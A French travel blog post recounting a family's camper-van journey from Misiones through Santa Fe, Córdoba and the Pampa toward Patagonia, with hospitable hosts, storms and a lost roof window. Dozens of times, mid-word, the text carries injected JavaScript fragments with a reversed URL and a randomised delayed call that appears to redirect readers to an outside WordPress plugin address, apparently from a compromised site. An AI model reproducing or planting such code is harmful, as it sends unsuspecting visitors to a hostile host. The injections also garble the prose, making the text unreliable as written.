De Misiones à la Pampa.

by Ben

De retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour en Argentine, il fait près de 40° quand nous posons les roues à Posadas. Nous sortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons de la ville et prenons une petite piste en terre pour passer la nuit dans un champs de Yerba Maté à l’ombre des pins.

En pleine partie de Uno, une voiture arrive et un homme nous aborde. Il s’appelle Carlos et nous propose de nous emmener dans son pickup pour faire “une petite visite” de l’estancia dans laquelle nous nous sommes malgré nous installés. Il est vétérinaire et s’occupe des 6000 vaches et des 400 000 poissons que l’estancia élève.  Nous passerons plus de 2 heures avec lui à parcourir une partie des 250 km² de la ferme. Carlos est adorable, aux petits soins pour nous pour répondre à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes nos questions et nous montrer un maximum de choses. Les paysages sont magnifiques, on en profite à fond. 

La nuit est horrible, plus de 36° dans le camion avec une forte humidité c’est trop pour nous. Il faut descendre au plus vite le plus au sud possible pour essayer de gagner un peu de fraîcheur. Le lendemain matin à 8h nous levons le camps. A peine nous regagnons la route qu’une voiture nous fait des appels de phare. C’est Carlos : “Ne partez pas maintenant, venez avec moi on va donner à boire aux veaux, ils meurent de soif. Ensuite on ira se rafraîchir à la maison je vous prépare un asado pendant que vous profiterez de la piscine”. Les enfants sont enchantés, ils adorent déjà Carlos, le sud attendra un peu. On est reçu comme des rois dans cette famille si sympathique.  Nous discuterons longtemps, surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout de la situation économique du pays qui préoccupe énormément toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les Argentins. Même au sein d’une famille de la classe moyenne Argentine, nous mesurons la chance que nous avons de pouvoir vivre cette aventure. La fille aînée de Carlos est orthophoniste, l’occasion pour Sé de discuter avec une collègue. Nous partirons en fin d’après-midi les bras remplis de cadeaux, et le cœur un peu triste de quitter ces personnes tellement adorables et intéressantes.

En route pour Santa Fé, soudain le ciel se couvre de nuage, la pluie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombe drue et le vent se lève, en moins de 5 minutes nous nous retrouvons dans une tempête avec une visibilité nulle. Derrière nous les camions roulent comme si de rien n’était, impossible de s’arrêter il faut avancer pour trouver un refuge. 10 minutes plus tard la tempête s’arrête presque d’un coup, nous nous arrêtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons pour vérifier que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout va bien, la plaque d’immatriculation du porte vélo s’est envolée. Tout va bien !

Le lendemain sur une petite route provinciale, mêmes symptômes, même situation mais les vents sont beaucoup plus forts et la route bien plus étroite. Le camping-car tangue fortement, un panneau annonce une station essence à 1 km. Il nous faudra près de 10 minutes pour l’atteindre. Quand nous arrivons la tempête vient juste de s’arrêter, et nous voyons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les employés de la station service sortir en hâte. Nous réalisons alors que ce que nous avons imaginé être notre refuge aurait pu en fait être un véritable piège. Les arbres sont couchés, la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiture est arrachée,  toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout est inondé, le chaos… Derrière nous deux voix nous interpellent : “Hey les parents, pourquoi on s’arrête ??!!!!” Plongés dans leurs livres, ils ne se sont rendus compte de rien !!!

Il nous faudra près de 4 jours de route et rejoindre Cordoba pour que la température décide enfin de baisser. Nous passerons 3 jours à profiter de la 2ème ville du pays. C’est ensuite une longue ligne droite vers le sud pour traverser les provinces de Cordoba et la Pampa. Quelques choses nous choque. Les paysages sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours aussi plats, les routes encore plus droites,  mais ici les près sont remplacés par des champs de soja, et les vaches sont parquées dans des petits enclos. 

La rentabilité du soja est une véritable catastrophe écologique et sanitaire pour les Argentins (et Paraguayens).

A Général Pico, la capitale de la Pampa nous sommes accueillis par Guillermo, Rosana et leurs 2 jumeaux de 12 ans. Ils sont artistes et très grands voyageurs, ils ont parcouru le monde avec un camping-car presque comme le nôtre, nous nous sentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons bien auprès d’eux et leurs amis. Les enfants jouent bien ensemble et nous resterons finalement 3 jours dans leur très agréable maison à profiter d’eux et à faire de l’entretien sur le camping-car. Encore une fois les adieux sont difficiles.

Toujours en direction du sud peu à peu la terre s’assèche et nous ne sommes pas mécontents de voir de moins en moins de soja. Les paysages sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours aussi monotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tones mais on préfère voir les vaches dans des près immenses que parquées dans des enclos sans herbe. 

En rejoignant la Ruta 3 à Bahia Blanca, nous arrivons enfin aux portes de la Patagonie. Encore quelques centaines de Km (et oui c’est comme ça que l’on compte ici…) et nous y serons. Pas mal de trafic et beaucoup de vent. Un camion nous croise de très près, le camping-car est balancé sur la droite,  on entend un grand bruit, on l’impression qu’il nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touché. En fait le souffle a été tellement fort que le dernier lanterneau de la capucine s’est envolé. Au milieu de nulle part, ce soir il pleut, c’est la tuile… Alors que nous nous morfondons sur notre sort, une grande fille de presque 11 ans nous dira : “Allez les parents, calmez-vous, c’est aussi ça le voyage !!!!” 

Impossible de retrouver le lanterneau. Il était arrivé la même mésaventure aux précédents propriétaires, cette fois-ci le camping-car n’aura définitivement plus de fenêtre sur la capucine !

Plusieurs dizaines de Km plus loin, la solidarité Argentine nous mènera chez Guillermo, un menuisier, qui se mettra en 4 pour nous trouver la meilleure solution avec les matériaux à sa disposition. La réparation est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top, le lanterneau est condamné juste avant que la pluie ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombe, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout est étanche. Vient le moment de partir et Guillermo m’explique qu’il n’est pas question de le payer. Et puis, selon lui, l’endroit n’est pas sûr alors il nous conseille de nous garer dans son jardin pour y passer la nuit. Nous passerons une très agréable soirée avec sa famille autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour évidemment d’un asado !

Définitivement ces Argentins sont adorables.